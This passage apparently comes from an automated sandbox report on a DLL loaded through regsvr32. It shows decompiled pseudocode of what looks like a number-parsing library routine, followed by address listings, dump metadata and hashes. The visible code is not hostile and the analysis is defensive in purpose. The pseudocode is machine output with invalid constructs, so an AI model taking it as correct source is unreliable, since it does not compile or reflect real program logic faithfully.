																		r8d = 0;
																		r9d = _t211 + _t222;
																		__eflags = r9d -  *(_t227 - 4);
																		if(r9d <  *(_t227 - 4)) {
																			L61:
																			r8d = 1;
																			L62:
																			 *(_t227 - 4) = r9d;
																			goto L63;
																		}
																		__eflags = r9d - _t182;
																		if(r9d >= _t182) {
																			goto L62;
																		}
																		goto L61;
																	}
																	r8d = 0;
																	r9d = _t211 + _t222;
																	__eflags = r9d -  *(_t227 - 4);
																	if(r9d <  *(_t227 - 4)) {
																		L57:
																		r8d = 1;
																		L58:
																		 *(_t227 - 4) = r9d;
																		goto L63;
																	}
																	__eflags = r9d - _t182;
																	if(r9d >= _t182) {
																		goto L58;
																	}
																	goto L57;
																	L63:
																	__eflags = r8d;
																	if(r8d != 0) {
																		 *_t227 =  *_t227 + 1;
																		__eflags =  *_t227;
																	}
																	_t177 = _t177 - 1;
																	_t245 =  &(_t245[1]);
																	_t242 = _t242 - 2;
																	__eflags = _t177;
																} while (_t177 > 0);
																L66:
																r12d = r12d - 1;
																_t227 =  &(_t227[0]);
																r13d = r13d + 1;
																__eflags = r12d;
															} while (r12d > 0);
															_t201 = _t200 + 0xc002;
															__eflags = _t201;
															if(__eflags <= 0) {
																r8d = _a88;
																_t195 = _a84;
																r9d = _a80;
																L81:
																_t201 = _t201 + 0xffff;
																__eflags = _t201;
																if(_t201 >= 0) {
																	L73:
																	_t150 = _a80 & 0x0000ffff;
																	L74:
																	__eflags = _t150 - 0x8000;
																	if(_t150 > 0x8000) {
																		L76:
																		_t151 = _a82;
																		__eflags = _t151 - 0xffffffff;
																		if(_t151 != 0xffffffff) {
																			_t152 = _t151 + 1;
																			__eflags = _t152;
																			_a82 = _t152;
																			_t195 = _a84;
																		} else {
																			_t156 = _a86;
																			_a82 = 0;
																			__eflags = _t156 - 0xffffffff;
																			if(_t156 != 0xffffffff) {
																				_a86 = _t156 + 1;
																				r8d = _a88;
																				_t195 = _a84;
																			} else {
																				_t158 = _a90 & 0x0000ffff;
																				_a86 = 0;
																				__eflags = _t158 - 0xffff;
																				if(_t158 != 0xffff) {
																					_t195 = _a84;
																					_a90 = _t158 + 1;
																					r8d = _a88;
																				} else {
																					_t195 = _a84;
																					_a90 = 0x8000;
																					r8d = _a88;
																					_t201 = _t201 + 1;
																				}
																			}
																		}
																		L91:
																		__eflags = _t201 - 0x7fff;
																		if(_t201 < 0x7fff) {
																			_a98 = _t195;
																			_t226 = _a64;
																			_a102 = r8d;
																			r8d = _a48;
																			_a96 = _a82 & 0x0000ffff;
																			_a106 = _t201 | _a56;
																			r9d = 0xffff8000;
																		} else {
																			__eflags = _a56;
																			_t226 = _a64;
																			r8d = _a48;
																			r9d = 0xffff8000;
																			_a100 = 0;
																			_t155 =  !=  ? r9d : 0x7fff8000;
																			_a96 = 0;
																			_a104 =  !=  ? r9d : 0x7fff8000;
																		}
																		goto L95;
																	}
																	r9d = r9d & 0x0001ffff;
																	__eflags = r9d - 0x18000;
																	if(r9d != 0x18000) {
																		goto L91;
																	}
																	goto L76;
																}
																r10d =  ~(_t201 & 0x0000ffff) & 0x0000ffff;
																_t201 = _t201 + r10w;
																__eflags = _t201;
																do {
																	__eflags = _a80 & 0x00000001;
																	if((_a80 & 0x00000001) != 0) {
																		r15d = r15d + 1;
																		__eflags = r15d;
																	}
																	r9d = r9d >> 1;
																	r9d = r9d | _t195 << 0x0000001f;
																	r8d = r8d >> 1;
																	_t195 = _t195 >> 0x00000001 | r8d << 0x0000001f;
																	_t242 = _t242 - 1;
																	__eflags = _t242;
																	_a80 = r9d;
																} while (_t242 != 0);
																__eflags = r15d;
																_a84 = _t195;
																_a88 = r8d;
																if(r15d == 0) {
																	goto L73;
																}
																_t150 = r9w | 0x00000001;
																_a80 = _t150;
																r9d = _a80;
																goto L74;
															}
															r8d = _a88;
															_t195 = _a84;
															r9d = _a80;
															while(1) {
																asm("inc ecx");
																if(__eflags < 0) {
																	break;
																}
																r8d = r8d + r8d;
																_t186 = _t195 >> 0x1f;
																r9d = r9d + r9d;
																_t195 = _t195 + _t195 | r9d >> 0x0000001f;
																r8d = r8d | _t186;
																_t201 = _t201 + 0xffff;
																_a84 = _t195;
																_a88 = r8d;
																__eflags = _t201;
																_a80 = r9d;
																if(__eflags > 0) {
																	continue;
																}
																goto L81;
															}
															__eflags = _t201;
															if(_t201 <= 0) {
																goto L81;
															}
															goto L73;
														}
														_t200 = _t200 + 1;
														asm("btr eax, 0x1f");
														__eflags = _t251[2];
														if(_t251[2] != 0) {
															goto L51;
														}
														__eflags = _t251[1];
														if(_t251[1] != 0) {
															goto L51;
														}
														__eflags =  *_t251;
														if( *_t251 != 0) {
															goto L51;
														}
														_t226 = _a64;
														_a104 = 0;
														_a100 = 0;
														_a96 = 0;
														goto L95;
													}
													_t200 = _t200 + 1;
													asm("btr eax, 0x1f");
													__eflags = _a104;
													if(_a104 != 0) {
														goto L46;
													}
													__eflags = _a100;
													if(_a100 != 0) {
														goto L46;
													}
													__eflags = _a96;
													if(_a96 != 0) {
														goto L46;
													}
													_t226 = _a64;
													_a106 = 0;
													goto L95;
												}
												_t226 = _a64;
												_a104 = 0;
												_a100 = 0;
												_a96 = 0;
											}
											L95:
											__eflags = r8d;
										} while (r8d != 0);
										_t199 = 0;
									}
									goto L98;
								}
							}
							do {
								_t244 = _t244 - 1;
								r10d = r10d + 0xffffffff;
								_t176 = _t176 + 1;
								__eflags =  *_t244;
							} while ( *_t244 == 0);
							goto L19;
						}
						_t174 = _a151 & 0x000000ff;
						__eflags = _t174 - 5;
						if(_t174 >= 5) {
							_t175 = _t174 + 1;
							__eflags = _t175;
							_a151 = _t175;
						}
						_t243 = _t243 - 1;
						r10d = 0x18;
						_t176 = _t176 + 1;
						goto L16;
					}
					r9d = 9;
					_t236 = _t236 - _t246;
					do {
						goto L1;
					} while (r9d != 0xa);
					_t199 = 0;
					__eflags = 0;
					goto L9;
				} else {
					do {
						_t188 =  *_t236;
						_t236 = _t236 + __r12;
					} while (_t188 == 0x30);
					goto L5;
				}
				L1:
				_t236 = _t236 + 1;
				if(r9d <= 0xb) {
					_t211 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}





















































                                                                              0x1004f04c
                                                                              0x1004f04c
                                                                              0x1004f04c
                                                                              0x1004f04c
                                                                              0x1004f04c
                                                                              0x1004f04c
                                                                              0x1004f04c
                                                                              0x1004f04f
                                                                              0x1004f055
                                                                              0x1004f06b
                                                                              0x1004f071
                                                                              0x1004f18e
                                                                              0x1004f191
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004f077
                                                                              0x1004f07d
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x00000000
                                                                              0x1004f060
                                                                              0x1004f060
                                                                              0x1004f060
                                                                              0x1004f063
                                                                              0x1004f066
                                                                              0x00000000
                                                                              0x1004f060
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 77a9d4acf58e92a0cf47f44eade605388619bf2630e06d69d2e52aacc2b60871
                                                                              • Instruction ID: f9a0a1b5d690b6e7c288f1d1af5c6f10a57fd921c457cb5855d359bf3bcb215e
                                                                              • Opcode Fuzzy Hash: 77a9d4acf58e92a0cf47f44eade605388619bf2630e06d69d2e52aacc2b60871
                                                                              • Instruction Fuzzy Hash: 895127B76287D4C6D760CF25E0447AAB7A1F385780F61411AEA8983F69DB7DC540CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004F0C4 Relevance: .2, Instructions: 162COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004F0C4(void* __ebx, void* __edx, signed int __ebp, signed char* __r8, void* __r9, void* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296, intOrPtr _a304) {
				unsigned int _t138;
				signed int _t139;
				signed short _t149;
				signed short _t150;
				signed short _t154;
				signed short _t155;
				signed int _t156;
				signed int _t160;
				signed int _t162;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed char _t179;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed short _t183;
				signed short _t184;
				signed int _t186;
				signed int _t190;
				signed int _t193;
				signed short _t197;
				signed int _t198;
				signed int _t201;
				signed int _t202;
				void* _t203;
				signed int _t204;
				signed int _t207;
				signed int _t208;
				void* _t218;
				signed long long _t224;
				void* _t225;
				void* _t227;
				long long _t229;
				signed int* _t230;
				long long _t232;
				void* _t234;
				signed long long _t237;
				long long _t240;
				void* _t242;
				signed int* _t243;
				void* _t244;
				signed int _t245;
				void* _t246;
				char* _t247;
				signed short* _t248;
				long long* _t250;
				signed int* _t253;

				_t250 = __r13;
				_t246 = __r11;
				_t242 = __r9;
				_t239 = __r8;
				_t208 = __ebp;
				_t180 = __ebx;
				if(_a304 == 0) {
					_t240 = __r8 - 1;
					_t202 = 0;
					goto L9;
				} else {
					_t232 = __r8 - 1;
					if(_t201 == 0x2b) {
						r9d = 7;
						do {
							goto L1;
						} while (r9d != 0xa);
						_t202 = 0;
						__eflags = 0;
						L9:
						__eflags = _t208;
						 *_t250 = _t240;
						if(_t208 == 0) {
							r8d = _t202;
							_t193 = _t202;
							_t202 = 4;
							L104:
							_t182 = 0;
							_t138 = 0;
							__eflags = 0;
							L105:
							_t243 = _a72;
							_t139 = _t138 | _a52;
							__eflags = _t139;
							_t243[2] = _t139;
							 *_t243 = _t182;
							_t243[0] = _t193;
							_t243[1] = r8d;
							__eflags = _a160 ^ _t237;
							return E10038D20(_t182, _a160 ^ _t237);
						}
						__eflags = r10d - 0x18;
						if(r10d <= 0x18) {
							__eflags = r10d;
							if(r10d == 0) {
								r8d = _t202;
								_t193 = _t202;
								goto L104;
							}
							L17:
							_t247 = _t246 - 1;
							__eflags =  *_t247;
							if( *_t247 != 0) {
								L20:
								_t12 =  &_a96; // 0x61
								_t13 =  &_a128; // 0x81
								E10052690(r10d, _t218, _t13, _t227, _t232, _t234, _t12, _t242, _t244, _t247);
								__eflags = r14d;
								if(r14d >= 0) {
									r8d = _a48;
								} else {
									r8d = _a48;
									r8d =  ~r8d;
								}
								r8d = r8d + _t180;
								__eflags = r12d;
								if(r12d == 0) {
									r8d = r8d + _a288;
									__eflags = r8d;
								}
								__eflags = r15d;
								if(r15d == 0) {
									r8d = r8d - _a296;
									__eflags = r8d;
								}
								__eflags = r8d - 0x1450;
								if(r8d > 0x1450) {
									_t193 = _t202;
									_t138 = 0x7fff;
									r8d = 0x80000000;
									_t202 = 2;
									_t182 = 0;
									goto L105;
								} else {
									__eflags = r8d - 0xffffebb0;
									if(r8d < 0xffffebb0) {
										r8d = _t202;
										_t193 = _t202;
										_t202 = 1;
										goto L104;
									}
									_t229 = 0x10070ac0;
									__eflags = r8d;
									if(r8d == 0) {
										L99:
										_t182 = _a96 & 0x0000ffff;
										_t193 = _a98;
										r8d = _a102;
										_t138 = _a104 >> 0x10;
										goto L105;
									}
									__eflags = r8d;
									if(r8d < 0) {
										r8d =  ~r8d;
										_t229 = 0x10070c20;
										__eflags = 0x10070c80;
									}
									__eflags = _a56;
									_t145 =  ==  ? 0 : _a96 & 0x0000ffff;
									__eflags = r8d;
									_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
									if(r8d == 0) {
										_t202 = 0;
										__eflags = 0;
									} else {
										r9d = 0xffff8000;
										do {
											_t229 = _t229 + 0x54;
											r8d = r8d >> 3;
											__eflags = r8d & 0x00000007;
											_a48 = r8d;
											_a64 = _t229;
											if((r8d & 0x00000007) == 0) {
												goto L96;
											}
											_t224 = _t214 + _t214 * 2;
											__eflags =  *((short*)(_t229 + _t224 * 4)) - 0x8000;
											_t253 = _t229 + _t224 * 4;
											if( *((short*)(_t229 + _t224 * 4)) >= 0x8000) {
												_t29 =  &_a112; // 0x71
												_t224 = _t29;
												 *_t224 =  *_t253;
												_t176 = _t253[2];
												_t31 =  &_a112; // 0x71
												_t253 = _t31;
												 *(_t224 + 8) = _t176;
												_t214 = _a112 >> 0x10;
												_t177 = _t176 - 1;
												__eflags = _t177;
												_a114 = _t177;
											}
											_t183 = _t253[2] & 0x0000ffff;
											_t149 = _a106 & 0x0000ffff;
											r15d = 0;
											_t184 = _t183 & 0x00007fff;
											_a80 = 0;
											_t150 = _t149 & 0x00007fff;
											_a84 = 0;
											_t197 = (_t183 & 0x0000ffff ^ _t149) & 0x00008000;
											__eflags = _t150 - 0x7fff;
											_a88 = 0;
											_a56 = _t197;
											_t203 = _t214 + _t224;
											if(_t150 >= 0x7fff) {
												L95:
												__eflags = _t197;
												_t229 = _a64;
												_t152 =  !=  ? r9d : 0x7fff8000;
												_a100 = 0;
												_a96 = 0;
												_a104 =  !=  ? r9d : 0x7fff8000;
											} else {
												__eflags = _t184 - 0x7fff;
												if(_t184 >= 0x7fff) {
													goto L95;
												}
												__eflags = _t203 - 0xbffd;
												if(_t203 > 0xbffd) {
													goto L95;
												}
												__eflags = _t203 - 0x3fbf;
												if(_t203 > 0x3fbf) {
													__eflags = _t150;
													if(_t150 != 0) {
														L47:
														__eflags = _t184;
														if(_t184 != 0) {
															L52:
															r13d = 0;
															_t230 =  &_a84;
															r12d = 5;
															do {
																__eflags = r12d;
																_t181 = r12d;
																_t225 = _t250 + _t250;
																if(r12d <= 0) {
																	goto L67;
																}
																_t59 =  &(_t253[2]); // 0x9
																_t245 = _t59;
																_t61 = _t225 + 0x60; // 0x65
																_t248 = _t237 + _t61;
																_t207 = r13d & 0x00000001;
																__eflags = _t207;
																do {
																	_t186 = ( *_t248 & 0x0000ffff) * ( *_t245 & 0x0000ffff);
																	__eflags = _t207;
																	if(_t207 == 0) {
																		r8d = 0;
																		r9d = _t214 + _t225;
																		__eflags = r9d -  *(_t230 - 4);
																		if(r9d <  *(_t230 - 4)) {
																			L62:
																			r8d = 1;
																			L63:
																			 *(_t230 - 4) = r9d;
																			goto L64;
																		}
																		__eflags = r9d - _t186;
																		if(r9d >= _t186) {
																			goto L63;
																		}
																		goto L62;
																	}
																	r8d = 0;
																	r9d = _t214 + _t225;
																	__eflags = r9d -  *(_t230 - 4);
																	if(r9d <  *(_t230 - 4)) {
																		L58:
																		r8d = 1;
																		L59:
																		 *(_t230 - 4) = r9d;
																		goto L64;
																	}
																	__eflags = r9d - _t186;
																	if(r9d >= _t186) {
																		goto L59;
																	}
																	goto L58;
																	L64:
																	__eflags = r8d;
																	if(r8d != 0) {
																		 *_t230 =  *_t230 + 1;
																		__eflags =  *_t230;
																	}
																	_t181 = _t181 - 1;
																	_t248 =  &(_t248[1]);
																	_t245 = _t245 - 2;
																	__eflags = _t181;
																} while (_t181 > 0);
																L67:
																r12d = r12d - 1;
																_t230 =  &(_t230[0]);
																r13d = r13d + 1;
																__eflags = r12d;
															} while (r12d > 0);
															_t204 = _t203 + 0xc002;
															__eflags = _t204;
															if(__eflags <= 0) {
																r8d = _a88;
																_t198 = _a84;
																r9d = _a80;
																L82:
																_t204 = _t204 + 0xffff;
																__eflags = _t204;
																if(_t204 >= 0) {
																	L74:
																	_t154 = _a80 & 0x0000ffff;
																	L75:
																	__eflags = _t154 - 0x8000;
																	if(_t154 > 0x8000) {
																		L77:
																		_t155 = _a82;
																		__eflags = _t155 - 0xffffffff;
																		if(_t155 != 0xffffffff) {
																			_t156 = _t155 + 1;
																			__eflags = _t156;
																			_a82 = _t156;
																			_t198 = _a84;
																		} else {
																			_t160 = _a86;
																			_a82 = 0;
																			__eflags = _t160 - 0xffffffff;
																			if(_t160 != 0xffffffff) {
																				_a86 = _t160 + 1;
																				r8d = _a88;
																				_t198 = _a84;
																			} else {
																				_t162 = _a90 & 0x0000ffff;
																				_a86 = 0;
																				__eflags = _t162 - 0xffff;
																				if(_t162 != 0xffff) {
																					_t198 = _a84;
																					_a90 = _t162 + 1;
																					r8d = _a88;
																				} else {
																					_t198 = _a84;
																					_a90 = 0x8000;
																					r8d = _a88;
																					_t204 = _t204 + 1;
																				}
																			}
																		}
																		L92:
																		__eflags = _t204 - 0x7fff;
																		if(_t204 < 0x7fff) {
																			_a98 = _t198;
																			_t229 = _a64;
																			_a102 = r8d;
																			r8d = _a48;
																			_a96 = _a82 & 0x0000ffff;
																			_a106 = _t204 | _a56;
																			r9d = 0xffff8000;
																		} else {
																			__eflags = _a56;
																			_t229 = _a64;
																			r8d = _a48;
																			r9d = 0xffff8000;
																			_a100 = 0;
																			_t159 =  !=  ? r9d : 0x7fff8000;
																			_a96 = 0;
																			_a104 =  !=  ? r9d : 0x7fff8000;
																		}
																		goto L96;
																	}
																	r9d = r9d & 0x0001ffff;
																	__eflags = r9d - 0x18000;
																	if(r9d != 0x18000) {
																		goto L92;
																	}
																	goto L77;
																}
																r10d =  ~(_t204 & 0x0000ffff) & 0x0000ffff;
																_t204 = _t204 + r10w;
																__eflags = _t204;
																do {
																	__eflags = _a80 & 0x00000001;
																	if((_a80 & 0x00000001) != 0) {
																		r15d = r15d + 1;
																		__eflags = r15d;
																	}
																	r9d = r9d >> 1;
																	r9d = r9d | _t198 << 0x0000001f;
																	r8d = r8d >> 1;
																	_t198 = _t198 >> 0x00000001 | r8d << 0x0000001f;
																	_t245 = _t245 - 1;
																	__eflags = _t245;
																	_a80 = r9d;
																} while (_t245 != 0);
																__eflags = r15d;
																_a84 = _t198;
																_a88 = r8d;
																if(r15d == 0) {
																	goto L74;
																}
